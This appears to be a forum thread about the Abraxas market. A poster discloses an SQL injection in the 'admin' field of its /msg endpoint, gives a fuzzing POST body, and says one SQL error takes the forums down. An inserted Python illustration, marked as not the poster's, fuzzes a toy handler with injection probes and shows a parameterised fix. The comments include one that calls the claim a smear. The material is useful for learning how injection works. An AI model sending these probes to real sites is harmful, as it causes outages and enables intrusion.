Breaking Abraxas' forums

Since I have not been able to contact Abraxas, I am posting here for all to see.

Abraxas has an SQL injection on the "admin" field for sending messages. If one is able to generate an SQL error, then they bring down the forums.

You can fuzz it yourself with the following payload:

_token=q2TpZNcUUgWe2UDbrHYw1SYF7gItscEgQJyeFSky&recipient=l2PhvDarUf&admin=§§&message=hi&message_delay_min=0&message_delay_max=2&send_message=1

on the /msg path using a POST method.

I do not believe I am able to mod after this, since there is a conflict of interest between my mod duties and my recent activities.
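As an added illustration (not code from the original post, and not Abraxas's code), the following replays the quoted form body the way Burp Intruder would: it expands the §§ insertion point on the "admin" field with a list of probe strings and sends each to a toy message handler. The handler, its schema, and the payload list are all assumptions constructed for this example; the point is to show why a single quote in that field produces an SQL error when the value is interpolated into the query, and why the same input is harmless once the field is validated and bound as a parameter.

```python
"""Burp-style expansion of a §§ marker, replayed against a toy handler.

Added example: the schema, the two handlers and the payload list are
constructed for the demonstration and are NOT the forum's real code.
"""
import sqlite3
from urllib.parse import parse_qs, quote

# The POST body quoted in the post, with the §§ Intruder marker on "admin".
TEMPLATE = (
    "_token=q2TpZNcUUgWe2UDbrHYw1SYF7gItscEgQJyeFSky&recipient=l2PhvDarUf"
    "&admin=§§&message=hi&message_delay_min=0&message_delay_max=2&send_message=1"
)

# Constructed probe list: two benign controls, a bare quote, a quote after a
# number, a boolean expression that stays syntactically valid, and a subquery
# that parses but fails at run time.
PAYLOADS = ["0", "1", "'", "1'", "1 OR 1=1", "(SELECT 1 FROM nope)"]


def expand(template: str, payload: str) -> dict:
    """Substitute one URL-encoded payload for §§ and parse the body into fields."""
    body = template.replace("§§", quote(payload, safe=""))
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def make_db() -> sqlite3.Connection:
    """Fresh in-memory table per probe so one failed statement cannot mask the next."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE messages (id INTEGER PRIMARY KEY, recipient TEXT, "
        "admin INTEGER, body TEXT)"
    )
    return db


def send_message_vulnerable(db: sqlite3.Connection, fields: dict) -> None:
    """Hypothetical vulnerable handler: the admin flag is pasted into the SQL text."""
    sql = "INSERT INTO messages (recipient, admin, body) VALUES ('%s', %s, '%s')" % (
        fields["recipient"], fields["admin"], fields["message"]
    )
    db.execute(sql)  # a malformed value here raises sqlite3.OperationalError
    db.commit()


def send_message_fixed(db: sqlite3.Connection, fields: dict) -> None:
    """Hardened handler: coerce the flag to 0/1, then bind every value."""
    admin = 1 if fields["admin"] == "1" else 0
    db.execute(
        "INSERT INTO messages (recipient, admin, body) VALUES (?, ?, ?)",
        (fields["recipient"], admin, fields["message"]),
    )
    db.commit()


def fuzz(handler) -> dict:
    """Replay every payload; map payload -> 'ok' or the SQL error class raised."""
    results = {}
    for payload in PAYLOADS:
        db = make_db()
        try:
            handler(db, expand(TEMPLATE, payload))
            results[payload] = "ok"
        except sqlite3.Error as exc:
            results[payload] = type(exc).__name__
        finally:
            db.close()
    return results


if __name__ == "__main__":
    for name, handler in (("vulnerable", send_message_vulnerable),
                          ("fixed", send_message_fixed)):
        print(name, fuzz(handler))
```

Against the interpolating handler, `'` and `1'` break the statement's syntax and `(SELECT 1 FROM nope)` fails at prepare time, all surfacing as `OperationalError`; `1 OR 1=1` goes through silently, which is the quieter injection a fuzzer that only watches for error pages would miss. Against the bound handler every probe is just data. Note that, as the post describes it, one SQL error is enough to take the forums down, so running a probe list like this against the live site is a denial of service rather than a harmless check.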


Comments


[5 Points] None:

Good for you. So now you're not a mod. More free time to continue to keep people safe and out of jail. I for one will continue to listen very carefully...


[2 Points] None:

How devious. You STILL haven't clarified if you're the_avid or not.


[2 Points] Trappy_Pandora:

Well, I was considering bringing BudCentral to Abraxas... That sure as hell isn't happening now!


[2 Points] None:

[deleted]


[1 Points] want2vape:

I support what you did here -thanks!


[0 Points] None:

It floors me that SQL injection still works. How can people not have heard of this by now? There is even a stupid XKCD about it.


[0 Points] throwawaysharpshitte:

Smear.

Says forum in the title but shows a URL address from the Market. The forum uses Simple Machines Forum with no URL rewrite, so index.php is ALWAYS present in the URL, so there is NO /msg URL.

I call you a LIAR whose only intention is to smear Abraxas. I would be surprised if you even contacted Abraxas staff.

Edit: typo